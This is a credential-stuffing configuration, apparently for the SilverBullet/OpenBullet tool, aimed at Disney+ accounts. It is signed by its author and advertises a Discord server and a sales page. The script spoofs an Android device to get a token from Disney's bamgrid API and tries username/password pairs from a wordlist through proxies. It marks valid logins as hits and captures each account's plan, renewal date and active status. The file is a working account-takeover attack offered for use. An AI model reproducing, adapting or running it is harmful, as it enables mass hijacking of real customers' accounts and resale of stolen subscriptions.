[SETTINGS]
{
  "Name": "DisneyPlus",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2021-07-12T20:14:21.0752746+02:00",
  "AdditionalInfo": "discord.gg/WYCf8nWvBV | sellix.io/RaReMoDz",
  "RequiredPlugins": [],
  "Author": "RaReMoDz#3662",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "DisneyPlus2",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION GenerateGUID -> VAR "guid" 

FUNCTION RandomString "?d?l?d?d?d?d?l?l" -> VAR "id" 

REQUEST POST "https://global.edge.bamgrid.com/graph/v1/device/graphql" 
  CONTENT "{\"query\":\"     mutation ($registerDevice: RegisterDeviceInput!) {       registerDevice(registerDevice: $registerDevice) {         __typename       }     }     \",\"variables\":{\"registerDevice\":{\"applicationRuntime\":\"android\",\"attributes\":{\"osDeviceIds\":[{\"identifier\":\"<id>\",\"type\":\"android.vendor.id\"}],\"manufacturer\":\"samsung\",\"model\":\"SM-G930K\",\"operatingSystem\":\"Android\",\"operatingSystemVersion\":\"5.1.1\"},\"deviceFamily\":\"android\",\"deviceLanguage\":\"en\",\"deviceProfile\":\"phone\"}}}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: BAMSDK/v6.1.0 (disney-svod-<id> 1.16.0.0; v3.0/v6.1.0; android; phone) samsung SM-G930K (RareMoDz on nulled 5.1.1 NRD90M 500210421 release-keys; Linux; 5.1.1; API 22)" 
  HEADER "Content-Length: 505" 
  HEADER "Host: global.edge.bamgrid.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip" 
  HEADER "Accept: application/json" 
  HEADER "Authorization: ZGlzbmV5JmFuZHJvaWQmMS4wLjA.bkeb0m230uUhv8qrAXuNu39tbE_mD5EEhM_NAcohjyA" 
  HEADER "X-BAMSDK-Platform-Id: android" 
  HEADER "X-Application-Version: google" 
  HEADER "X-BAMSDK-Client-ID: disney-svod-<id>" 
  HEADER "X-BAMSDK-Platform: android" 
  HEADER "X-BAMSDK-Version: 6.1.0" 
  HEADER "X-DSS-Edge-Accept: vnd.dss.edge+json; version=2" 
  HEADER "X-BAMSDK-Transaction-ID: <guid>" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Ban OR 
    KEY "<RESPONSECODE>" Contains "403" 
    KEY "<SOURCE>" DoesNotContain "accessToken" 

PARSE "<SOURCE>" JSON "accessToken" -> VAR "token1" 

REQUEST POST "https://global.edge.bamgrid.com/v1/public/graphql" 
  CONTENT "{\"operationName\":\"loginMobile\",\"variables\":{\"input\":{\"email\":\"<USER>\",\"password\":\"<PASS>\"}},\"query\":\"mutation loginMobile($input: LoginInput!) { login(login: $input) { __typename account { __typename ...accountGraphFragment } activeSession { __typename ...sessionGraphFragment } } } fragment accountGraphFragment on Account { __typename id activeProfile { __typename id } profiles { __typename ...profileGraphFragment } parentalControls { __typename isProfileCreationProtected } flows { __typename star { __typename isOnboarded } } attributes { __typename email emailVerified userVerified locations { __typename manual { __typename country } purchase { __typename country } registration { __typename geoIp { __typename country } } } } } fragment profileGraphFragment on Profile { __typename id name maturityRating { __typename ratingSystem ratingSystemValues contentMaturityRating maxRatingSystemValue isMaxContentMaturityRating } isAge21Verified flows { __typename star { __typename eligibleForOnboarding isOnboarded } } attributes { __typename isDefault kidsModeEnabled groupWatch { __typename enabled } languagePreferences { __typename appLanguage playbackLanguage preferAudioDescription preferSDH subtitleLanguage subtitlesEnabled } parentalControls { __typename isPinProtected kidProofExitEnabled liveAndUnratedContent { __typename enabled } } playbackSettings { __typename autoplay backgroundVideo prefer133 } avatar { __typename id userSelected } } } fragment sessionGraphFragment on Session { __typename sessionId device { __typename id } entitlements experiments { __typename featureId variantId version } homeLocation { __typename countryCode } inSupportedLocation isSubscriber location { __typename countryCode } portabilityLocation { __typename countryCode } preferredMaturityRating { __typename impliedMaturityRating ratingSystem } }\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json" 
  HEADER "Authorization: <token1>" 
  HEADER "X-BAMSDK-Platform-Id: android" 
  HEADER "X-Application-Version: google" 
  HEADER "X-BAMSDK-Client-ID: disney-svod-<id>" 
  HEADER "X-BAMSDK-Platform: android" 
  HEADER "X-BAMSDK-Version: 6.1.0" 
  HEADER "X-DSS-Edge-Accept: vnd.dss.edge+json; version=2" 
  HEADER "X-BAMSDK-Transaction-ID: <guid>" 
  HEADER "User-Agent: BAMSDK/v6.1.0 (disney-svod-<id> 1.16.0.0; v3.0/v6.1.0; android; phone) samsung SM-G930K (RareModz 5.1.1 NRD90M 500210421 release-keys; Linux; 5.1.1; API 22)" 
  HEADER "Content-Length: 1868" 
  HEADER "Host: global.edge.bamgrid.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Account\",\"id\"" 
  KEYCHAIN Failure OR 
    KEY "Bad credentials sent for" 
    KEY " is not a valid email Address at /email'" 
  KEYCHAIN Retry OR 
    KEY "forbidden" 
    KEY "access-token.invalid" 
    KEY "<RESPONSECODE>" Contains "403" 
    KEY "<RESPONSECODE>" Contains "400" 

PARSE "<SOURCE>" JSON "accessToken" -> VAR "token2" 

REQUEST GET "https://global.edge.bamgrid.com/subscriptions" 
  
  HEADER "User-Agent: BAMSDK/v6.1.0 (disney-svod-<id> 1.16.0.0; v3.0/v6.1.0; android; phone) samsung SM-G930K (RareModz on nulled 5.1.1 NRD90M 500210421 release-keys; Linux; 5.1.1; API 22)" 
  HEADER "Authorization: Bearer <token2>" 
  HEADER "X-Application-Version: google" 
  HEADER "X-BAMSDK-Client-ID: disney-svod-<id>" 
  HEADER "X-BAMSDK-Platform: android" 
  HEADER "X-BAMSDK-Version: 6.1.0" 
  HEADER "X-DSS-Edge-Accept: vnd.dss.edge+json; version=2" 
  HEADER "X-BAMSDK-Transaction-ID: <guid>" 
  HEADER "Host: global.edge.bamgrid.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip" 

PARSE "<SOURCE>" JSON "name" Recursive=TRUE CreateEmpty=FALSE -> CAP "Plan" 

PARSE "<SOURCE>" JSON "subType" CreateEmpty=FALSE -> CAP "subType" 

PARSE "<SOURCE>" JSON "nextRenewalDate" CreateEmpty=FALSE -> CAP "Renewal Date" 

PARSE "<SOURCE>" JSON "isActive" CreateEmpty=FALSE -> CAP "isActive" 

KEYCHECK 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "[]" 
    KEY "\"cancellation\":{\"reason\"" 
    KEY "<isActive>" Contains "false" 
    KEY "<isActive>" Contains "False" 
  KEYCHAIN Retry OR 
    KEY "The request could not be satisfied" 
    KEY "unauthorized_client" 
    KEY "invalid-token" 
    KEY "<RESPONSECODE>" Contains "400" 
    KEY "<RESPONSECODE>" Contains "403" 
  KEYCHAIN Success OR 
    KEY "<isActive>" Contains "True" 

FUNCTION Constant "RaReMoDz#3662" -> CAP "Config Made By" 

